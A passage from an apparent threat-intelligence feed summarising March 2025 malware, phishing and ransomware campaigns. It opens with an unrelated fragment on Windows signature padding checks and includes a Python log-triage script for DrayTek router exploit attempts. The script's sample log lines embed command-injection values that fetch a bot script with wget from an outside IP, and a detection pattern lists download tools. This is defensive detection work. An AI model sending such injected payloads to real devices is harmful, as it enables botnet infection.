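On a real driver the `cert` slice holds a genuine PKCS#7 SignedData structure, and the check is the same. The Windows-side equivalent is the opt-in strict padding check that Microsoft shipped with the CVE-2013-3900 fix (the `EnableCertPaddingCheck` value under `HKLM\Software\Microsoft\Cryptography\Wintrust\Config`, and the `Wow6432Node` path on 64-bit systems); it is still off by default, so a driver whose padding area carries foreign bytes will verify unless that value is set.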
Python Bot Delivered Through DLL Side-Loading
released on 2025-03-18 @ 12:42:33 PM
A sophisticated malware campaign employs DLL side-loading to deliver a Python bot. The attack begins with a ZIP archive containing a legitimate PDF reader executable and a hidden malicious DLL. When executed, the malicious DLL is loaded instead of the intended Microsoft one, altering the PDF reader's behavior. The malware then unpacks a Python environment, fetches the bot code from a Bitbucket repository, and establishes persistence through registry modifications. The attacker uses various techniques to bypass security controls, including renaming processes and prepending a Byte Order Mark to scripts. The campaign demonstrates advanced evasion tactics and leverages trusted applications to deploy its payload.
ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery
released on 2025-03-18 @ 09:46:02 AM
ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver malware through drive-by downloads. Threat Actors compromise legitimate websites, injecting malicious JavaScript code that redirects users to convincing fake update pages for browsers like Chrome and Edge. These pages prompt users to download updates hosted on platforms such as Dropbox and OneDrive, which actually contain malware payloads. Notably, since late September, ClearFake has altered its code injection tactics, now utilizing smart contracts from the Binance Smart Chain.
StilachiRAT analysis: From system reconnaissance to cryptocurrency theft
released on 2025-03-17 @ 10:21:29 PM
Microsoft Incident Response researchers discovered a novel remote access trojan named StilachiRAT, demonstrating sophisticated evasion, persistence, and data exfiltration techniques. The malware collects extensive system information, targets cryptocurrency wallet extensions, steals browser credentials, establishes command-and-control communication, executes remote commands, achieves persistence through Windows services, monitors RDP sessions, collects clipboard data, and employs anti-forensic measures. The analysis reveals its potential for cryptocurrency theft and system manipulation.
New Steganographic Campaign Distributing Multiple Malware Variants
released on 2025-03-17 @ 06:17:24 PM
A sophisticated steganographic campaign has been observed distributing multiple malware variants, including the Remcos and DcRAT remote access trojans and the AgentTesla and VIPKeyLogger stealers. The infection chain begins with a phishing email containing an Excel file that exploits CVE-2017-0199. This leads to the download of an HTA file, which in turn downloads a VBS script. The script retrieves a JPG file concealing base64-encoded malware. The payload is then injected into legitimate processes using process hollowing techniques. The campaign demonstrates advanced evasion methods and the potential to deploy various remote access trojans, highlighting the need for robust cybersecurity practices.
Off the Beaten Path: Recent Unusual Malware
released on 2025-03-17 @ 09:40:53 AM
The article examines three unusual malware samples: a C++/CLI IIS backdoor enabling stealthy remote command execution, a bootkit leveraging the GRUB 2 bootloader to gain early system control and persistence, and a cross-platform post-exploitation framework developed in C++. These cases highlight evolving attacker techniques that prioritize stealth, persistence, and unconventional execution methods to evade detection.
Negative Exposure: Edimax Network Cameras Used to Spread Mirai
released on 2025-03-17 @ 09:28:52 AM
The Akamai Security Intelligence and Response Team (SIRT) has identified a critical command injection vulnerability, CVE-2025-1316, in Edimax IC-7100 IP cameras. This flaw allows attackers to execute arbitrary commands remotely, leading to the integration of these devices into Mirai-based botnets. The vulnerability stems from improper neutralization of special elements in OS commands, enabling remote code execution through specially crafted requests. At the time of reporting, Edimax had not provided patches, leaving affected devices exposed to ongoing exploitation.
Inside BRUTED: Black Basta (RaaS) Used Automated Brute Forcing Framework to Target Edge Network Devices
released on 2025-03-17 @ 09:02:00 AM
Black Basta ransomware group has been using a previously unknown brute forcing framework called BRUTED since 2023. This framework automates internet scanning and credential stuffing against edge network devices, including firewalls and VPN solutions. The group targets high-impact industries, with Business Services being the most targeted sector. BRUTED enables Black Basta affiliates to scale attacks and expand their victim pool. The framework supports multiple vendors and technologies, using specialized brute-force logic for each platform. Black Basta's strategy involves exploiting edge network devices for initial access, then targeting ESXi hypervisors to maximize operational impact. The leak of internal chat logs has likely disrupted Black Basta's operations, but former members may reintegrate into other ransomware-as-a-service ecosystems.
Mirai Bot now incorporating (malformed?) DrayTek Vigor Router Exploits
released on 2025-03-17 @ 05:39:23 AM
A report details the incorporation of exploits targeting DrayTek Vigor routers into the Mirai botnet. Previously disclosed vulnerabilities affecting approximately 700,000 devices are being exploited, with attacks focusing on the 'keyPath' and 'cvmcfgupload' parameters. A curious spike in malformed exploit attempts, missing a dash in 'cgi-bin', has been observed. The attacks aim to upload and execute bot variants, primarily Mirai. The latest malformed exploit attempts to download a multi-architecture bash script and the actual bot. String analysis of the bot reveals attempts to exploit other vulnerabilities and likely includes a brute force component.
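The report above notes that the malformed attempts drop the dash from 'cgi-bin', which means a signature keyed only on the correct path would miss them. The following is an added example, not code from the report, that classifies web-server log lines by whether they hit the well-formed or dash-less path, which of the two parameters named above they carry, and whether the `keyPath` value contains command-injection markers. The log lines are constructed Apache-style samples (the endpoint path `mainfunction.cgi` and the log format are assumptions), not captures from the honeypot.

```python
"""Classify DrayTek-style exploit attempts in web logs, including the dash-less path.

Added example; constructed sample lines, not honeypot data from the report.
"""
from __future__ import annotations
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style log lines (assumption: path /cgi-bin/mainfunction.cgi)
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Mar/2025:05:00:01 +0000] "GET / HTTP/1.1" 200 512',
    '198.51.100.7 - - [17/Mar/2025:05:00:02 +0000] "POST /cgi-bin/mainfunction.cgi'
    '?action=login&keyPath=%27%3Bwget%20http%3A%2F%2F203.0.113.9%2Fbot.sh%3B%27'
    '&loginUser=a&loginPwd=a HTTP/1.1" 200 17',
    '198.51.100.8 - - [17/Mar/2025:05:00:03 +0000] "POST /cgibin/mainfunction.cgi'
    '?action=login&keyPath=%27%3Bwget%20http%3A%2F%2F203.0.113.9%2Fx.sh%3B%27'
    '&loginUser=a&loginPwd=a HTTP/1.1" 404 0',
    '198.51.100.9 - - [17/Mar/2025:05:00:04 +0000] "POST /cgi-bin/mainfunction.cgi/cvmcfgupload HTTP/1.1" 200 0',
    '10.0.0.6 - - [17/Mar/2025:05:00:05 +0000] "POST /cgi-bin/mainfunction.cgi'
    '?action=login&keyPath=defaultkey&loginUser=admin&loginPwd=x HTTP/1.1" 200 30',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# Optional dash so both /cgi-bin/ and the malformed /cgibin/ variant match
CGI_RE = re.compile(r"^/cgi(?P<dash>-?)bin/mainfunction\.cgi(?P<upload>/cvmcfgupload)?", re.I)
# Shell metacharacters and fetch/execute verbs that have no business in a key path
INJECT_RE = re.compile(r"[;`|&\n]|\$\(|\$\{IFS\}|\b(?:wget|curl|tftp|sh|chmod)\b", re.I)


def classify(line: str) -> dict | None:
    """Return None for uninteresting lines, else path form, vector and injection flag."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    cgi = CGI_RE.match(parts.path)
    if not cgi:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes values
    key_path = params.get("keyPath", [""])[0]
    if cgi.group("upload"):
        vector = "cvmcfgupload"
    elif "keyPath" in params:
        vector = "keyPath"
    else:
        vector = None
    return {
        "path": "malformed-no-dash" if cgi.group("dash") == "" else "well-formed",
        "vector": vector,
        "injection": bool(INJECT_RE.search(key_path)),
    }


def scan(lines: list[str]) -> list[dict]:
    """Classify each line and attach the source IP for triage."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            verdict["src"] = line.split(" ", 1)[0]
            hits.append(verdict)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Note that the dash-less request in the sample returns a 404, as it would on a real router: the malformed attempts fail, but they still identify the scanning source and the payload host, which is the part worth extracting.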
Credit Card Skimmer and Backdoor on WordPress E-commerce Site
released on 2025-03-15 @ 07:22:22 AM
A sophisticated malware attack targeting WordPress WooCommerce sites was discovered, involving multiple components: a credit card skimmer, a hidden backdoor file manager, and a reconnaissance script. The attack focused on financial gain and long-term control. The skimmer, injected into the checkout page, collected payment and billing information, sending it to a malicious server. A PHP backdoor allowed remote system command execution, while a reconnaissance script gathered server information. The attack demonstrates the evolving complexity of e-commerce platform threats, emphasizing the need for strict security measures, regular scans, proper access controls, and timely updates to prevent such exploits.
New Ransomware Operator Exploits Fortinet Vulnerability Duo
released on 2025-03-14 @ 07:18:14 PM
A new ransomware operator, dubbed Mora_001, has been exploiting Fortinet firewall vulnerabilities CVE-2024-55591 and CVE-2025-24472 to gain unauthorized access and deploy a modified version of LockBit ransomware. The threat actor creates persistent admin accounts, exfiltrates firewall configurations, and uses VPN access for lateral movement. They selectively target file servers for encryption after data theft. The ransomware, named SuperBlack, uses LockBit's infrastructure but removes branding. The actor employs a custom VPN brute-forcing tool and leaves ransom notes linking to LockBit's Tox chat ID. This campaign highlights the increasing trend of exploiting perimeter security appliances and the evolving ransomware landscape.
Off the Beaten Path: Recent Unusual Malware
released on 2025-03-14 @ 04:37:45 PM
This article examines three unique malware samples discovered in the past year. The first is a passive IIS backdoor written in C++/CLI, an uncommon language for malware. It has extensive functionality and appears professionally developed, possibly for targeted attacks. The second is a bootkit that installs a customized GRUB 2 bootloader to play Dixie through the PC speaker on boot. While sharing some characteristics with Equation Group malware, it's likely unrelated. The third is a new cross-platform post-exploitation framework called ProjectGeass, still in development. It has features like file management, keylogging, and payload execution. These samples demonstrate novel techniques being used by malware authors.
VHDs Used to Distribute VenomRAT and Other Malware
released on 2025-03-14 @ 10:16:40 AM
A phishing campaign is utilizing virtual hard disk (VHD) image files to deliver VenomRAT malware. The attack begins with a purchase order-themed email containing a ZIP archive with a VHD file. When opened, the VHD mounts as a drive and executes a heavily obfuscated batch script. This script employs PowerShell to perform malicious activities, including dropping files in the Startup folder for persistence, modifying registries, and connecting to Pastebin for C2 communication. The malware creates a DataLogs.conf file to capture keystrokes and sensitive data, which is then exfiltrated to the C2 server. The campaign also utilizes AES encryption and multiple layers of obfuscation to evade detection.
SocGholish's Intrusion Techniques Facilitate Distribution of RansomHub Ransomware
released on 2025-03-14 @ 10:16:39 AM
SocGholish, a malware-as-a-service framework, is being used to deploy RansomHub ransomware. It compromises legitimate websites, redirecting visitors to fake browser updates that deliver malicious payloads. The highly obfuscated JavaScript loader evades detection and executes various tasks, including reconnaissance, credential theft, and backdoor deployment. Water Scylla, the group behind this activity, collaborates with threat actors operating rogue Keitaro TDS instances for payload distribution. The attack chain involves multiple stages, from initial access to ransomware deployment. SocGholish's versatile loader can download and execute malicious payloads, exfiltrate data, and execute arbitrary commands. Recent detections show high activity in the US, primarily targeting government organizations.
Ramadan Scams on the Rise: Fake Giveaways, Crypto Traps & Fraudulent Donations
released on 2025-03-14 @ 09:06:40 AM
Cybercriminals are exploiting Ramadan's spirit of generosity through various scams targeting unsuspecting individuals. These include wallet-draining schemes disguised as religious incentives, fraudulent crypto tokens, fake e-commerce sales, and deceptive donation campaigns. Scammers utilize social media verification badges, AI-generated promotions, and psychological manipulation to lure victims. The scams range from 'earn while you worship' programs to fake data pack giveaways and counterfeit product listings. The rise of Ramadan-themed tokens on cryptocurrency platforms highlights the need for increased regulation. Victims are often tricked into connecting their crypto wallets or sharing personal information, leading to financial losses and potential identity theft.
Patch it up: Old vulnerabilities are everyone's problems
released on 2025-03-14 @ 12:35:45 AM
This analysis emphasizes the importance of addressing old vulnerabilities in software systems globally. It highlights the end of Windows 10 support in October 2025 and the risks associated with unpatched systems. The article discusses the relevance of vulnerabilities regardless of geographic location, citing examples like Log4j and NotPetya. It also mentions a recent CVE (CVE-2025-22224) that affected over 40,000 instances globally within a week of discovery. The article stresses the need for regular software updates and patching, regardless of nationality or location, to maintain robust cybersecurity.
Affiliate Fraud at Scale: AI, Black Hat SEO, Social Media, and Brand Abuse in iGaming and VPNs
released on 2025-03-13 @ 11:23:28 PM
A large-scale affiliate marketing campaign has been uncovered, utilizing AI-generated content, automation, fake social media accounts, and Black Hat SEO to manipulate search rankings and drive traffic to iGaming and VPN promotions. The operation involves thousands of subdomains, redirection chains, and fake social media accounts across multiple platforms. The campaign aligns with high-traffic events and seasonal promotions, exploiting affiliate programs like 7StarPartners and NordVPN. It employs sophisticated SEO manipulation techniques and AI-generated content in multiple languages to maximize visibility and engagement. The fraudulent activities undermine market integrity, consumer trust, and legitimate businesses' visibility while compromising the reliability of affiliate programs.
Phishing campaign impersonates Booking.com, delivers a suite of credential-stealing malware
released on 2025-03-13 @ 04:57:01 PM
A phishing campaign targeting the hospitality industry impersonates Booking.com to deliver multiple credential-stealing malware families. The threat actor, tracked as Storm-1865, uses a social engineering technique called ClickFix to trick users into downloading malicious payloads. Targets are sent emails with links to fake Booking.com pages, which prompt users to execute commands that download malware. The campaign delivers various malware families including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. Organizations in North America, Oceania, Asia, and Europe are targeted. The threat actor's evolving tactics demonstrate attempts to bypass conventional security measures.
Head Mare and Twelve: Joint attacks on Russian entities
released on 2025-03-13 @ 02:58:11 PM
Head Mare and Twelve, two hacktivist groups, have launched joint attacks on Russian companies. Head Mare has expanded its toolkit, now using tools previously associated only with Twelve, such as the CobInt backdoor. The attackers gained initial access through phishing emails and compromised contractors. They used various tools for reconnaissance, privilege escalation, lateral movement, and data exfiltration. The final goal was file encryption using LockBit 3.0 and Babuk ransomware. Overlaps in infrastructure, tactics, and tools suggest collaboration between the two groups. The attacks primarily targeted manufacturing, government, and energy sectors in Russia.
Investigating Scam Crypto Investment Platforms Using Pyramid Schemes to Defraud Victims
released on 2025-03-13 @ 02:58:09 PM
A campaign distributing thousands of fraudulent cryptocurrency investment platforms via websites and mobile applications has been uncovered. The operation impersonates well-known brands and organizations, luring victims with unrealistic promises of high returns. The consistent design of the platforms suggests the use of a standardized toolkit for large-scale development. Domains are primarily registered in Singapore using lenient registrars and fake names. The scam targets users in East African and Asian countries, utilizing Telegram channels for engagement. The platforms operate like Ponzi schemes, encouraging user recruitment through multi-level affiliate programs. Evidence points to a single threat actor behind the campaign, given the consistent registration patterns and infrastructure use.
File Hashes Analysis with Power BI from Data Stored in DShield SIEM
released on 2025-03-13 @ 09:45:58 AM
This analysis showcases the use of Power BI to examine file hash data from a DShield SIEM over a 60-day period. The process involved exporting data from Elastic Discover, importing it into Power BI, and creating visualizations for analysis. Key findings include the identification of an IP address (87.120.113.231) associated with RedTail malware, uploading six different files with multiple hashes. The analysis also revealed the reappearance of a previously identified Linux Trojan (Xorddos) from new IP addresses within the same subnet. Additionally, two strange filenames were discovered and investigated, with one identified as an IRCBot through VirusTotal. This method of large dataset analysis proves valuable in uncovering potentially overlooked or lost data through retrospective examination.
Unmasking GrassCall Campaign: The Hackers Behind Job Recruitment Cyber Scams
released on 2025-03-13 @ 12:47:42 AM
The GrassCall malware campaign, orchestrated by the Russian-speaking cybercriminal group 'Crazy Evil,' targets job seekers in the cryptocurrency and Web3 sectors. The attackers create fake companies and job postings, luring victims into downloading malicious software disguised as a video conferencing application. This sophisticated social engineering attack deploys Remote Access Trojans and information-stealing programs like Rhadamanthys for Windows users and Atomic macOS Stealer for Mac users. The campaign aims to compromise systems and steal cryptocurrency assets, with hundreds of people already affected. The infection chain involves impersonation, phishing communication, and malware deployment, showcasing the group's advanced tactics in identity fraud and cryptocurrency theft.
Remote Monitoring and Management (RMM) Tooling Increasingly an Attacker's First Choice
released on 2025-03-12 @ 04:00:35 PM
Threat actors are increasingly using legitimate remote monitoring and management (RMM) tools as initial payloads in email campaigns. This trend aligns with a decrease in the use of traditional loaders and botnets by initial access brokers. RMMs can be exploited for data collection, financial theft, lateral movement, and installing additional malware. Notable RMM tools observed in campaigns include ScreenConnect, Fleetdeck, and Atera. The shift towards RMM usage coincides with law enforcement disruptions of major malware families and a decline in ransomware payments. Specific threat actors like TA583 and TA2725 have been observed incorporating RMMs into their attack strategies. Organizations are advised to restrict unauthorized RMM installations, implement network detections, and train users to identify suspicious activity.
JSPSpy and 'Filebroser': A Custom File Management Tool in Webshell Infrastructure
released on 2025-03-12 @ 02:52:32 PM
Researchers have identified a cluster of JSPSpy web shell servers featuring 'Filebroser', a modified version of the open-source File Browser project. The infrastructure spans multiple hosting providers in China and the United States, using both cloud services and traditional ISPs. JSPSpy, a Java-based web shell first observed in 2013, has been used by various threat actors, including the Lazarus Group. The servers typically host JSPSpy on port 80, with one instance on port 8888. Two servers also host the 'filebroser' login panel on port 8001. Detection strategies for JSPSpy include analyzing login page titles and HTTP response headers. The presence of 'filebroser' alongside JSPSpy raises questions about its purpose in attack operations.
Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets Juniper Routers
released on 2025-03-12 @ 02:52:32 PM
China-nexus espionage group UNC3886 has been discovered deploying custom backdoors on Juniper Networks' Junos OS routers. The attackers used TINYSHELL-based backdoors with varying capabilities, including active and passive functions, and an embedded script to disable logging. The group demonstrated advanced knowledge of system internals and focused on maintaining long-term access while minimizing detection risk. UNC3886 targeted defense, technology, and telecommunication organizations in the US and Asia, leveraging legitimate credentials for initial access. The malware ecosystem included six distinct samples, each with unique features for bypassing security measures and maintaining persistence. The activity highlights the ongoing trend of targeting networking infrastructure for espionage purposes.
APT37 - RokRat
released on 2025-03-12 @ 11:56:14 AM
APT37, a North Korean state-sponsored hacking group, has expanded its operations to target users on Windows and Android platforms through phishing campaigns. The group's attack vector involves malicious LNK files distributed via group chat platforms. The infection process begins with phishing emails containing ZIP attachments that conceal malicious LNK files. When executed, these files initiate a multi-stage attack using batch scripts and PowerShell, ultimately deploying RokRat as the final payload. RokRat, a remote access Trojan, collects detailed system information, abuses cloud services for command and control, and employs anti-analysis techniques. It can execute remote commands, exfiltrate data, and perform various malicious activities on infected systems.
Hundreds of thousands of rubles for your secrets: cyber spies disguise themselves as recruiters
released on 2025-03-12 @ 11:52:32 AM
Cybercriminals impersonating a real company are sending fake job descriptions to employees of targeted organizations. The attackers, known as Squid Werewolf, are offering substantial sums of money, potentially hundreds of thousands of rubles, in exchange for sensitive information. This sophisticated phishing campaign aims to exploit the trust associated with legitimate recruitment processes to gather confidential data from unsuspecting employees. The operation demonstrates the evolving tactics of cyber espionage groups, blending social engineering with financial incentives to compromise organizational security.
Stopping Sobolan Malware with Aqua Runtime Protection
released on 2025-03-12 @ 11:48:30 AM
A new attack campaign targeting interactive computing environments like Jupyter Notebooks has been discovered. The attack involves downloading a compressed file from a remote server, which, when executed, deploys multiple malicious tools to exploit the server and establish persistence. The campaign poses a significant risk to cloud-native environments by enabling unauthorized access and long-term control over compromised systems. The attack flow includes initial access through an unauthenticated JupyterLab instance, downloading and extracting malicious files, executing scripts to launch additional binaries, and establishing persistence while evading detection. The malware deploys cryptominers and attempts to kill competing processes. Runtime protection solutions can effectively detect, block, and mitigate these threats using real-time threat intelligence, malware scanning, and customizable policies.
New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects
released on 2025-03-11 @ 05:34:55 PM
Microsoft Threat Intelligence has discovered a new variant of XCSSET, a sophisticated macOS malware that infects Xcode projects. This latest version features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies. The malware steals and exfiltrates files, system information, and user data, including digital wallet information and notes. It uses a modular approach with encoded payloads, improved error handling, and heavy use of scripting languages and legitimate binaries. The malware's infection chain consists of four stages, with the fourth stage running various sub-routines. Notable capabilities include three distinct persistence techniques and a new infection method for Xcode projects. The malware's command-and-control server is active and downloading additional modules.
Trump Cryptocurrency Delivers ConnectWise RAT
released on 2025-03-11 @ 05:34:55 PM
An email campaign impersonating Binance is offering fake TRUMP coins to lure victims into downloading a malicious 'Binance Desktop' application, which actually installs ConnectWise RAT. The attackers have created a convincing web page mimicking Binance's interface to host the malware download. Once infected, threat actors quickly establish remote control of the victim's computer, targeting saved passwords in applications like Microsoft Edge. The campaign employs sophisticated social engineering tactics, including sender name spoofing and risk warnings, to appear legitimate. Threat actors are actively monitoring infections and can connect to compromised systems within minutes of installation.
Desert Dexter. Attacks on Middle Eastern Countries
released on 2025-03-11 @ 04:42:13 PM
A malicious campaign targeting residents of the Middle East and North Africa has been discovered, active since September 2024. The attackers create fake news groups on social media and publish posts with links to file-sharing services or Telegram channels containing modified AsyncRAT malware. The malware is designed to search for crypto wallets and interact with a Telegram bot. The most targeted countries include Egypt, Libya, UAE, Russia, Saudi Arabia, and Turkey. The attack chain involves multiple stages, including the use of PowerShell scripts and a reflective loader written in C#. The AsyncRAT modification includes an offline keylogger and collects information about crypto wallet extensions and software. The campaign has affected approximately 900 victims from various countries, including employees of companies in the oil extraction, construction, IT, and agriculture sectors.
Caution Against Watering Hole Attack and Malicious File Distribution Disguised as Unification Education Support Application
released on 2025-03-11 @ 02:21:48 PM
A watering hole attack targeting unification education program applicants has been discovered. The attackers uploaded malicious HWP document files to a notice board for an educational program. When opened, the file executes hidden malicious code through OLE objects. The malware creates persistence using scheduled tasks, downloads additional payloads, and communicates with a command and control server. Based on the techniques used, the attack is attributed to the North Korean Kimsuky group. Users are advised to exercise caution when downloading application forms from such websites.
Analysis of Lazarus Group's Attack Targeting Windows Web Servers
released on 2025-03-11 @ 02:20:43 PM
The Lazarus group has been targeting Windows web servers, particularly in South Korea, installing webshells and C2 scripts to use compromised servers as proxies. The attacks involve multiple stages, including the use of LazarLoader malware and privilege escalation tools. The C2 scripts act as proxies between the malware and secondary C2 servers. Various webshells were identified, including RedHat Hacker and custom ASP shells. The LazarLoader downloader was used to fetch additional payloads, while a privilege escalation tool exploited UAC bypass techniques. The attackers aim to establish persistence and gain elevated access on compromised systems.
Camera off: Akira deploys ransomware via webcam
released on 2025-03-11 @ 02:20:08 PM
Akira, a prominent ransomware group, accounted for 15% of incidents in 2024, showcasing novel evasion techniques. In a recent attack, Akira circumvented an Endpoint Detection and Response (EDR) tool by compromising an unsecured webcam to deploy ransomware. After initial detection, the group pivoted to exploit IoT devices, particularly a vulnerable webcam running Linux. This allowed them to execute their Linux ransomware variant without EDR interference. The incident highlights the importance of comprehensive security measures, including IoT device monitoring, network segmentation, and regular audits. Key takeaways include prioritizing patch management for all devices, adapting to evolving threat actor tactics, and ensuring proper EDR implementation.
A Deep Dive into Strela Stealer and how it Targets European Countries
released on 2025-03-11 @ 02:16:47 PM
Strela Stealer is an infostealer targeting email clients in specific European countries. It exfiltrates login credentials from Mozilla Thunderbird and Microsoft Outlook. The malware is delivered through phishing campaigns, primarily affecting Spain, Italy, Germany, and Ukraine. Recent campaigns involve forwarding legitimate emails with malicious attachments. Strela Stealer employs custom obfuscation techniques and code-flow flattening to complicate analysis. The malware verifies the system's locale before executing, targeting specific language regions. It searches for email client profile data, encrypts it, and exfiltrates it to a command-and-control server. The infrastructure used by Strela Stealer is linked to Russian bulletproof hosting providers, suggesting potential ties to Russian threat actors.
Infostealer Campaign against ISPs
released on 2025-03-11 @ 02:14:23 PM
A campaign targeting ISP infrastructure providers on the West Coast of the United States and China has been identified. Originating from Eastern Europe, the attackers use simple tools to abuse victims' computer processing power for cryptomining and credential theft. The initial access is gained through brute force attacks using weak credentials. The malware has diverse functions including data exfiltration, additional crimeware deployment, self-termination to avoid detection, persistence establishment, remote access disabling, and pivot attacks to targeted CIDRs. The actors perform minimal intrusive operations, relying on scripting languages and API calls for C2 operations. The campaign specifically targets ISP infrastructure, likely for cryptomining purposes.
AI-Assisted Fake GitHub Repositories Fuel SmartLoader and LummaStealer Distribution
released on 2025-03-11 @ 12:42:48 PM
A campaign using fake GitHub repositories to distribute SmartLoader and Lumma Stealer malware has been uncovered. The attackers create convincing repositories using AI-generated content to deceive users into downloading malicious files disguised as gaming cheats, cracked software, and system tools. The malware is delivered through obfuscated Lua scripts in ZIP files, exploiting GitHub's trusted reputation to evade detection. Upon execution, SmartLoader facilitates the delivery of Lumma Stealer, which can steal sensitive information like cryptocurrency wallets, 2FA extensions, and login credentials. This campaign demonstrates the evolving tactics of cybercriminals, adapting from using GitHub file attachments to creating entire repositories with AI-assisted deception.
Malicious Packages Identified in the Wild: Insights and Trends from November 2024 Onward
released on 2025-03-10 @ 08:29:08 PM
FortiGuard Labs has analyzed malicious software packages detected from November 2024 to March 2025, revealing various attack techniques used to exploit system vulnerabilities. Key findings include 1,082 packages with low file counts, 1,052 packages with suspicious install scripts, and 1,043 packages lacking repository URLs. Attackers employ methods such as obfuscation, command overwrite, and typosquatting to bypass security measures. The analysis highlights the use of suspicious APIs, URLs, and installation scripts to exfiltrate data, establish backdoors, and perform remote control activities. Specific cases involve malicious Python and Node.js packages targeting developers and harvesting sensitive information. The report emphasizes the importance of robust detection strategies and proactive defense measures to mitigate these evolving cybersecurity threats.
Blind Eagle: …And Justice for All
released on 2025-03-10 @ 07:04:48 PM
Check Point Research uncovered ongoing campaigns by Blind Eagle targeting Colombian institutions since November 2024. The group exploits a variant of CVE-2024-43451, using malicious .url files to deliver malware. Their attack chain includes HeartCrypt-packed executables, a .NET RAT, and Remcos RAT as the final payload. The campaigns have high infection rates, with over 1,600 victims in a single operation. Blind Eagle utilizes legitimate platforms like Google Drive and GitHub for malware distribution. The group's operating timezone suggests South American origins. An operational failure revealed past phishing activities targeting Colombian banks, resulting in over 8,000 stolen PII entries.
Highway Robbery 2.0: How Attackers Are Exploiting Toll Systems in Phishing Scams
released on 2025-03-10 @ 01:04:09 PM
A massive SMS phishing campaign targeting U.S. drivers exploits various toll systems, including E-ZPass, SunPass, and TxTag. The scam uses fake payment alerts sent via iMessage and SMS from foreign numbers to lure victims to fraudulent websites. Analysis reveals a pattern in domain names and infrastructure, with most phishing sites hosted on Chinese ASNs like Tencent and Alibaba Cloud. The campaign employs nginx web servers and constantly shifts tactics to evade detection. Over 2,000 complaints have been filed with the FBI's Internet Crime Complaint Center, prompting warnings from the FTC and toll authorities. The scam's effectiveness stems from the inconsistency in legitimate toll collection domain names, making it challenging for users to distinguish between real and fake websites.
SideWinder targets the maritime and nuclear sectors with an updated toolset
released on 2025-03-10 @ 10:24:58 AM
The SideWinder APT group intensified its activities in the second half of 2024, targeting maritime infrastructures, logistics companies, and nuclear sectors across Asia, the Middle East, and Africa. The group updated its toolset, including improvements to its RTF exploit, JavaScript loader, and Backdoor Loader. SideWinder's infection chain begins with spear-phishing emails containing malicious DOCX files, exploiting CVE-2017-11882 to deliver a multi-stage payload. The group demonstrated agility in evading detection, often updating their tools within hours of being identified. Notable targets included government entities, military installations, and diplomatic missions, with an increased focus on maritime and nuclear-related organizations.
Russian State Actors: Development in Group Attributions
released on 2025-03-08 @ 11:40:19 AM
This analysis explores the evolution of Russian state-backed cyber actors and their operations. It highlights the activities of several prominent groups, including UNC2589, APT44 (Sandworm), APT29, and APT28. These actors, associated with various Russian intelligence agencies, have been involved in global espionage, sabotage, and influence operations. The report details their targets, which include government organizations, critical infrastructure, and diplomatic entities across multiple countries. It also describes the groups' adaptation to new security measures and their use of advanced techniques such as zero-day exploits, social engineering, and living off the land tactics. The analysis emphasizes the importance of understanding these actors' methods for improving global cybersecurity resilience.
Cascading Redirects: Unmasking a Multi-Site JavaScript Malware Campaign
released on 2025-03-07 @ 04:25:03 AM
A recent investigation uncovered a malicious JavaScript injection affecting WordPress websites, redirecting visitors to unwanted third-party domains. The attack vector involves a two-stage redirection process, injecting code into theme files and loading external scripts. The malware creates hidden elements to force redirects, potentially leading to phishing pages, malvertising, exploit kits, or scam sites. At least 31 infected websites were identified, with domains like awards2today[.]top and chilsihooveek[.]net involved. The infection methods include compromised admin accounts, exploited vulnerabilities, inadequate file permissions, and hidden PHP backdoors. Impacts include traffic loss, reputation damage, SEO blacklisting, and risks of further infections. Detection involves inspecting network activity and file modifications, while prevention measures include regular security audits, updates, strong passwords, and web application firewalls.
Malvertising campaign leads to info stealers hosted on GitHub
released on 2025-03-06 @ 11:02:41 PM
A large-scale malvertising campaign impacting nearly one million devices globally was detected in December 2024. The attack originated from illegal streaming websites with embedded malvertising redirectors, leading users through multiple redirections to malware hosted on GitHub and other platforms. The multi-stage attack chain involved deploying information stealers like Lumma and Doenerium, as well as remote access tools. The threat actors used living-off-the-land techniques and various scripts to collect system information, exfiltrate data, and establish persistence. The campaign affected both consumer and enterprise devices across multiple industries, highlighting its indiscriminate nature.
Medusa Ransomware Activity Continues to Increase
released on 2025-03-06 @ 10:32:43 PM
Medusa ransomware attacks jumped by 42% between 2023 and 2024. This increase in activity continues to escalate, with almost twice as many Medusa attacks observed in January and February 2025 as in the first two months of 2024.
Unmasking GrassCall Campaign: The APT Behind Job Recruitment Cyber Scams
released on 2025-03-06 @ 07:25:58 PM
The GrassCall malware campaign is an advanced social engineering attack conducted by a Russian-speaking cybercriminal group called Crazy Evil. Targeting job seekers in the cryptocurrency and Web3 sectors, the campaign uses fake job interviews to compromise victims' systems and steal cryptocurrency assets. The attackers create a fake company, post job advertisements on reputable platforms, and guide candidates through a sophisticated process involving phishing emails, Telegram conversations, and the installation of malicious software disguised as a video conferencing application. The malware deployed includes a Remote Access Trojan (RAT) and information-stealing programs like Rhadamanthys for Windows users, and the Atomic macOS Stealer (AMOS) for Mac users. The campaign has affected hundreds of people, with some victims reporting drained cryptocurrency wallets.
Unmasking the new persistent attacks on Japan
released on 2025-03-06 @ 07:25:57 PM
An unknown attacker has been targeting organizations in Japan since January 2025, exploiting CVE-2024-4577, a remote code execution vulnerability in PHP-CGI on Windows. The attacker uses the Cobalt Strike kit 'TaoWu' for post-exploitation activities, including reconnaissance, privilege escalation, persistence establishment, and credential theft. Targeted sectors include technology, telecommunications, entertainment, education, and e-commerce. The attack involves exploiting the vulnerability, executing PowerShell scripts, and using various tools for system compromise. The attacker's techniques are similar to those of the 'Dark Cloud Shield' group, but attribution remains uncertain. A pre-configured installer script found on the C2 server deploys multiple adversarial tools and frameworks, indicating potential for future attacks.
BADBOX 2.0 Targets Consumer Devices with Multiple Fraud Schemes
released on 2025-03-06 @ 12:31:04 PM
